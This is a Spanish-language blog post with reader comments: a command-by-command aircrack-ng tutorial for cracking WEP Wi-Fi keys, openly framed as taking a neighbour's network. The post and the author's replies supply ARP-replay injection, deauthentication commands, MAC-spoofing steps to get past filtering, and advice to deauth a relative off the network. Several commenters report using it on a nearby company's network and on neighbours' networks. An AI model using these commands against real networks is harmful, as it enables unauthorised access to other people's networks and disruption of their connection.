domingo, noviembre 30, 2008

Entonces el otro día

Que me preguntan: “cómo recupero el password de la wep de mi casa?” (por no decir “robo” y “vecino” (o cómo hackear la red inalámbrica))

Ahh pues muy fácil… entonces me puse a hacer una guía y pues mejor se las pongo aquí… nunca saben cuando se puede necesitar…

Bajen una versión bonita de BackTrack y sigan las instrucciones felices de abajo

# iniciar con KDE, (compiz) da problemas =)
# abrir la consola y escribir iwconfig y te fijas en el nombre de la tarjeta inalambrica
# En este caso voy a usar eth1

#escribes en la consola para encender el modo monitor:
airmon-ng start eth1

#despues hay que encender el programa de captura para ver que redes hay y quienes estan conectados
airodump-ng eth1

#van a salir en la parte de arriba las redes y abajo las computadoras asociadas a la red.
#Necesitas escoger una red que tenga al menos una computadora conectada o que la columna de Data crezca rapido
#Ya que sabes la red te fijas en que canal (CH) esta, yo voy a usar el 11
#Das ctrl + c para regresar a la consola
#Y comenzamos la captura de paquetes de un canal guardandolos en un archivo con el
#siguiente comando:

airodump-ng --channel 11 -w archivosalida.txt eth1

#Con esto el programa empieza a capturar los paquetes y los guarda en ese archivo
#El archivo de seguro se guarda en /root por si lo quieres usar o copiar mas adelante
#Acuerdate que como es live cd no se guardan los archivos, por lo que si lo quieres guardar necesitas una usb o ponerlo en el disco duro =)

#ahora hay que abrir otra consola para inyectar paquetes y que esto no se tarde mil horas
#el comando es el siguiente :

aireplay-ng --arpreplay -x 4 -h macaddressdealguienconectado -b macdelaccesspointdelared eth1

#esto lo sacas del otro programa que esta corriendo
#alguienconectado es la columna->STATION
#macdelaccesspoint es la columna-> BSSID
#el -x es el numero de paquetes q inyectas... mi tarjeta se traba y por eso le puse 4 para que
#bajara la velocidad... si la tuya aguanta mas pues ponle 10 o 20

#queda algo asi:
aireplay-ng --arpreplay -x 4 -h 00:14:78:8E:31:F9 -b 00:1D:5A:40:12:69 eth1

#bueno, con esto si lees un paquete que se pueda repetir la maquina lo va a inyectar a lo loco

#ahora falta hacer que la maquina conectada se desconecte e intente conectarse para
#generar mas paquetes que se pueden repetir =)
#solo que este comando hay q usarlo una vez y esperarte un ratito (para q las computadoras se desconecten y se vuelvan a conectar)
#este comando lo puedes hacer para cuantas computadoras haya conectadas al access point
#Abre otra consola y el comando es el siguiente:

aireplay-ng --deauth 1 -a macdelBSSID -c macdelSTATION eth1

#son los mismos de hace rato pero con otras letras
#queda algo asi

aireplay-ng --deauth 1 -a 00:1D:5A:40:12:69 -c 00:14:78:8E:31:F9 eth1

#y ya, en la consola con la que repetimos paquetes debe de empezar a captar paquetes para repetir, por lo que en la consola que esta capturando en la columna de data debe de empezar a crecer el numero

#Si ves que los paquetes que se estan repitiendo ya no suben la columna de data tan rapido entonces intenta lo de deautenticar de nuevo =)

#finalmente necesitas crackear la wep del archivo
#abre otra consola y el comando es el siguiente

aircrack-ng -n 64 archivodesalida.cap

#el -n 64 es para el numero de bits de la llave... no me acuerdo con cuantos paquetes obtienes la llave... creo que con 150,000 ya se puede obtener, pero no estoy seguro (infinitum usa 64 bits casi siempre)
#Pero si ves que no sale y ya tienes muchos paquetes intenta cambiando por -n 128

#y fijate bien como se llama el archivo de salida con el comando ls

#Cuando tengas suficientes paquetes te saldra la wep en esa consola =)
#algo asi como

KEY FOUND! [ 37:13:37:79:75 ]

#esa es la wep =)

#Te dejo un resumen de los comandos, cada uno en una ventana distinta ^^:

airmon-ng start eth1

airodump-ng --channel 11 -w archivosalida eth1

aireplay-ng --arpreplay -x 4 -h 00:14:78:8E:31:F9 -b 00:1D:5A:40:12:69 eth1

aireplay-ng --deauth 1 -a 00:1D:5A:40:12:69 -c 00:14:78:8E:31:F9 eth1

aircrack-ng -n 64 archivosalida-01.cap

**************************************
Update

Hoy que no tenia ni acentos ni nada mejor que hacer. Decidi probar mis metodos de crackeo de wep q debo confesar no uso desde hace mucho jajaja, los pasos nadamas me los sabia de memoria, el resultado fue que en lo que fui por comida y regrese ya habia terminado.
La saco en menos de 5 min y con 10, 215 paquetes jajaja mhhh creo q exagere con los 150,000. Pero claro el numero de paquetes depende de que tan buena sea la clave wep




45 comentarios:

El Maxi dijo...

Hola, muy bueno el tutorial, quise probarlo, pero. el BackTrack me dice que solo soporta dispositivos IDE y SATA, el mio es SCSI.

Que puedo hacer en este caso. ya qie no quiere inciar el live cd. Hay alguna otra distribucion con la que pueda hacer esto?

Monty dijo...

Mhhh buena pregunta, no lo he intentado con scsi nunca, deja checo

Monty dijo...

Ahh se me ocurre q bootees desde usb como yo le hago :P
(bueno, si es q tu máquina lo soporta)

Mhh baja el iso, después lo abres con winrar y lo extraes

te deben de quedar 2 carpetas:
BT3 y boot

abres cmd (bueno supongo q lo harás desde windows... porq no jala backtrack jajaa)

abres cmd y suponiendo q el usb es la unidad I escribes las instrucciones:

I:
cd boot
bootinst.bat

te va a decir un mensaje q si estas seguro q es la unidad, le pones q si y ya

apagas la máquina y booteas desde el usb a ver si así te jala

Por cierto no le pasa nada a los archivos q tienes en el usb y lo puedes seguir usando normalmente :)

El Maxi dijo...

Haber voy a empezar a bajar el otro archivo :S. Si hay algo de bueno te lo comento.

Monty dijo...

Y por cierto cualquier otra distribución puede hacer eso, solo que backtrack ya tiene instalados los programas.

Puedes usar fedora o ubuntu o lo que se te venga en gana e instalar aircrack

http://www.aircrack-ng.org/

Alan Rodríguez dijo...

Excelente tutorial. Yo ya tenia instalado el aircrack en mi openSUSE 11, pero no sabia como usarlo.

Me quedé a nada de jalar la contraseña de Fractalia, una empresa de TI que está arriba de mi universidad, pero creo que se dieron cuenta y apagaron el módem xD, no me dio tiempo de enviar suficientes paquetes.

Pero de que funciona, funciona :D

Monty dijo...

Bueno, siempre puedes guardar los archivos de salida y juntarlos con los que captures después con ivstools igual de aircrack y ya juntos ver si tienes suficientes paquetes :)

ivstools --merge archivo1.ivs archivo2.ivs archivosalida.ivs

Barbara dijo...

monty demostrando el por qué ya se graduó... jaja!

Monty dijo...

Y eso q no he puesto passwords de maestros ni así jajaja

nomás q me den mi título

:)

Alan Rodríguez dijo...

Bueno... me reporto de nuevo porque acá en mi casa intenté hacerlo, pero no funcionó porque no habia ningun otro equipo conectado a la Red.

Igual y me queda la duda... quiero obtener la clave del cifrado WEP del modem infinitum, porque no me lo sé. Es de mi vecino y el mismo me pasa internet por medio de un cable de red conectado directamente al modem.

Igual y quisiera saber si al estar conectado alámbricamente al modem del que intento obtener la clave, me da alguna ventaja o por ahi habrà algùn mètodo :P

Monty dijo...

Pues si estás conectado por cable te puedes meter a la configuración del módem ( http://home o http://192.168.1.254 (esas direcciones son las q vienen por default) ) ahí no viene la clave en texto plano, pero la puedes cambiar (si tienes privilegios,y obviamente si se la cambias el vecino se da cuenta), también puedes ver quienes están conectados al aparato, velocidad de conexión y varias cosas más.

Mejor pídele la clave o espérate a que se conecte alguien en la red inalámbrica :P

aLex rOa dijo...

yo tengo una mac, como puedo lograr hackear una red inalambrica?

Monty dijo...

Véndela y te compras algo q sí sirva :)

jajaja

nah, igual con backtrack :) baja el live cd y úsalo

Claro dijo...

Hola, muy bueno el tutorial, mi duda es si estos comandos funcionan de la misma forma para todas las tarjetas inalámbricas? o si el factor de la marca afecta los comandos a utilizar durante el proceso..?

Monty dijo...

Mhh los comandos en sí no deben de cambiar.

Pero la interfaz(nombre de la tarjeta) sí, tu tarjeta se puede llamar distinto como eth0, ath1, wlan0, etc...

Ahora que si tu tarjeta no es compatible con los programas pues no va a funcionar :S

Sayapo dijo...

hola baje el cd pero a la hora de meterlo me dice acceso denegado, no se que hacer, podrian ayudarme

Monty dijo...

jajaja que???

explica mejor q hiciste :P
porq no entendí nada

Sayapo dijo...

jeje sere mas especifico, pues queme el cd,(las 2 carpetas y su contenido) lo introdusco en el lector, abro el cmd y tecleo
g:
cd boot
bootinst.bat

pero resulta que no lo corre, de inmediato me aparece acceso denegado, no se a que se deba.
otra cosa, tengo una tarjeta madre asus p5wdh ya trae incorporada la tarjeta de red, crees que sea compatible? mi primo tiene una por via usb, sera compatible con la de el? sale bro, gracias

Monty dijo...

Ahh ps muy fácil, te sale acceso denegado porque ya no puedes escribir en el cd! :P

lo de el cmd es para instalarlo en una usb, copia las carpetas al usb y ya jalan los comandos

ahora que si tu tarjeta madre no puede bootear desde usb nadamás quema la imagen del cd tal cual y bootea desde ahí sin moverle nada al contenido del cd

y pues yo creo que sí es compatible la tarjeta de red, ahora que con tarjetas usb nunca he probado

Anónimo dijo...

hey hola, acabo de bajar el programa ese pero no se como quemarlo, lo descomprimo y meti las 2 carpetas que trae en un cd con el nero y lo queme pero no me arranca cuando lo trato de bootear hay algun comando o algo asi para quemarlo en el cd o un conjuro? gracias mi buen

Anónimo dijo...

damn, que extraño, no soy el genio de esto pero hasta yo se que no furula, ya tengo mi disco (quiero pensar que bien quemado) tecleo g:CD \BOOT\DOS BT3.bat y se inicia, pero me dice lo sig: cpu is in v86-mode may be windows, emm386,qemm,386 max you need pure 386/486 real mode or vcpi server to boot linux vcpi is suppoirted by most ems drivers if ems enable...

changos no entiendo, que pasa por que a todos les jala y a mi no y segui tu recomendacion que posteabas mas arriba para iniciarlo desde usb pero mi pc no soporta el boteo desde usb asi que a fuerza debe ser de cd, que a caso hay alguna forma especial de hacerlo funcionar o quemarlo?

Monty dijo...

Válgame, pero qué andan haciendo??
jajaja

Mhh a ver, si no saben como o no pueden bootear desde usb olviden todo lo de el cmd y bájense la versión de cd de backtrack. Es un iso... solo quémenlo y booteen desde el cd. =)

Anónimo dijo...

a lo que me refiero es que he entrado a la pagina del backtrack y hay 3 archivos para descargar, he bajado el primero que decia CD y decia ser .iso, lo descomprimi y me salieron las 2 carpetas las cuales queme por medio de nero pero el problema es que reinicio la pc con el cd dentro y no lo corre, no puedo bootearlo (si ya configure mi cd room como dispositivo de booteo primario) me equivoque al quemarla o hice algo mal? por que entre a otra pagina que decia que se podia crear una iso por medio de comandos en la consola etc... hice la prueba con lo del usb y si me creo mi memoria booteable, el problema es con el cd, alguna recomendacion? gracias carnalito

Monty dijo...

Mhh sí, no descomprimas el .iso, quémalo tal cual.

No sé que versión de nero tengas pero si no busca un programa que sí te soporte sin descomprimir.

Igual si ya te funciona con usb pues te la recomiendo más q el cd, la usb es mucho más rápida, el cd tarda años en cargar

Sayapo dijo...

Oye bro por fin he podido obtener mi primera key, me dio unos problemas, algunos inconvenientes y errores pero al final fue cosa de unos minutos y listo, solo que me quedo una duda, obtuve la contraseña y reinicie mi maquina para poder conectarme con ella y probar a ver si si servia, solo que mi tarjeta de red estaba en el modo de escucha o monitor o como le quieran llamar, y ps obviamente no me detectaba ninguna red y ni siquiera me aparecia habilitada, pense en reinstalar el adaptador y los drivers por que la vdd no encontraba como regresarla a la normalidad, pero se fue la luz, cuando llego conecte la pc y voala, ya servia como si nada, podrias decirme en caso de que no se solucione esto solo hay algun comando o algo que al final ya obteniendo la key deba teclear para regresarla a la normalidad, thks y buen tuto bro, y sobre todo gracias x tu ayuda

Monty dijo...

Cuando termines ponle

airmon-ng stop eth1

y ya ^^

aunque a mi nunca me ha pasado que se quede en modo monitor

yoshi dijo...

hey bro, disculpa en mi lista me aparece una red que tiene un nombre que incluye un espacio, ej fulanito perez, a la hora de que trato de asociarme con su ruter no me deja por que me dice que el comando es erroneo y me sugiere ayuda, pero si le quito el espacio me dice que el ssid esta incorrecto, en estos casos en los cuales contenga espacios, es posible hacerlo o como se le hace? tambien me pasa con otra que me dice que probablemente tenga filtrando la mac o algo asi y no me deja asociarme a ella, hay alguna forma de hacerlo??

Monty dijo...

Mhhh nunca lo he intentado con ssid con espacios. Inténtalo con la consola o con el GUI jajaja, a ver si una de esas pega. Luego hay gui's que le das click y te asocian XD

Y si tienen filtrado de mac, pues fijate en la mac de una compu conectada y se la copias =)

yoshi dijo...

Descubri que para poner ssid con espacios solo debes ponerlas entre comillas,pero ahora me salio otra duda, fijate que me trato de asociar con su ruter y me sale sending authenticaion request (open system) y asi se la pasa y al final me marca error, para poder hacerlo nesecito a fuerza que haya al menos una compu conectada en ese momento a la red?

Monty dijo...

No, si ya tienes la wep no es necesario

Kolumbus:Obama dijo...

te preguntare, amo y señor de la tecnologia, ingeniero, es posible crackear una wep pero ke tenga el filtrado de macs habilitado?

Monty dijo...

Jajaja q titulos raros son esos??

Y la respuesta es que sí se puede.

Solo tienes que cambiar tu mac a una que sí se pueda conectar a la red y ya ^^

Kolumbus:Obama dijo...

Master Monty:

y esa mac donde la compro? se la pido a la virgencita o ke, como puedo obtener/crear una mac que si se pueda asociar a la red?

Monty dijo...

jajajaja!!!!

Mhhh sí, tienes q portarte bien o la virgencita nadamás no te hará caso

O te puedes esperar a los reyes :P


A i te van los comandos:
ifconfig eth0 down
ifconfig eth0 hw ether "pon una direccion mac q si se pueda conectar"
ifconfig eth0 up

Kolumbus:Obama dijo...

oye brother pero de donde saco la mac que si se pueda conectar?, osea uso esos comandos que me diste, pero el punto es que nesecito la mac que si se pueda conectar, pero esa de donde sale, por que vi por ahi que debia sniffear la red y podria de ahi obtenerla, pero y si es una sola maquina y no una red de 2 o 3? al final la pregunta es la misma, de donde saco una mac que si me deje conectarme a ese modem que quiero crackear
Dios te bendiga (y carlos slim te maldiga por que le has hecho perder 300 pesos que me costaba el internet XD, ahora me cuelgo jeje)

Monty dijo...

Pues la respuesta es la misma, te fijas en la mac de la computadora que sí está conectada (sniffeando) y te la adjudicas

Y pues si solo es una, te tendrás que conectar con esa e ingeniártelas a cambiarle a la configuración del router que haga el filtrado de mac para q acepte la tuya sin q tengas q andar cambiando tu mac a cada rato

jorge lopez dijo...

hey mi buen monty, oye bro tengo una preguntota para ti que lo sabes todo, he crackeado una red, gozo de sus privilegios y toda la fregadera, pero mi hermano el cual vive al lado y al que le pase la contraseña es medio ojaldra y nos peleamos, quiero dejarlo sin internet al muy perro, el modem es de infinitum, me meti a la configuracion del modem y le he movido fregadera y media y no logro dejarlo sin internet, las unicas formas que se me ocurren es cambiar la contraseña, por lo cual no solo lo jodo a el, sino al verdadero dueño ya que no podra entrar de nuevo y llamara al tecnico etc... hay alguna forma de bloquear la mac de mi hermano o hacer que el modem no le pueda dar una ip o algo?

Monty dijo...

Depende que sistema tengas, por ejemplo el 2700HG Gateway no te deja hacer filtrado de mac, pero el 2701HG-T sí te deja.

Supongo que tienes uno q no te deja, así q lo único que se me ocurre para no dejar afuera al vecino es modificar directamente la configuración a la computadora de tu hermano y cambiarle el default gateway por alguna tontería

Ahora que también lo puedes atacar deautenticándolo, como en el tutorial (bueno, obvio con las macs que sí son):

aireplay-ng --deauth 1 -a 00:1D:5A:40:12:69 -c 00:14:78:8E:31:F9 eth1

Solo que mientras lo atacas tu tampoco tienes internet jajaja :P

Ya no se peleen

M dijo...
Este comentario ha sido eliminado por el autor.
M dijo...

oye...
y como le hago cuando salen letras?? o eso que significa??

me salio KEY FOUND! [A5:43:FF:F5:7A]

creo asi no son las claves de infinitum
pero igual se la puse...
pero no funciono...

que hago??

Monty dijo...

La clave que sacaste está en hexadecimal de ahi las letras
(A=10...F=15), que te salgan letras no tiene ningún problema. Y la clave debe de funcionar bien, solamente cuando la escribas no uses los ":"

=)

Ricardo Vladimir dijo...

hola que tal yo hice todo lo que dices en tu tutorial, solo que yo tengo una ralink y no atheros pero me funciono, en lugar de poner eth1 ponia wlan0, se tardo 24 horas en poder sacar los 160000 ivs y le puse 128 bit despues de 4 minutos me saco la keyfound en hexadecimal y en ascii me trate de conectar pero no sirvio, que pued ser??? hice algo mal si se puede hacer con una ralink como yo le hice o de plano ya no le intento??

Monty dijo...

Pues nunca me ha tocado una de 128, porque Telmex tanto con 2Wire como con Thomson usan por default 64 bits.
Si no borraste el archivo de captura intenta con 64 bits a ver que pasa, con esa cantidad de paquetes te la debe de sacar muy rápido.
En cualquier caso si ya te salió KEYFOUND con los 128, fijate que el 100% de los paquetes haya sido desencriptado. Si no es así, vuelve a correr aircrack-ng a ver si te sale otra llave. También intenta cambiando las opciones de aircrack.

Mhh, aunque puede ser también que la hayas regado al conectarte, revisa como te estás conectando (si es con Backtrack tienes que usar airmon-ng stop wlan0 para apagar el modo monitor) en cualquier caso yo recomiendo probar con windows jaja, y le puedes poner directamente la clave en hexadecimal (sin los ":" )
=)

Anónimo dijo...

crees que lo pueda hacer con mi celular nokia n82??....

Monty dijo...

Npi, pero qué tiene de malo usar una lap??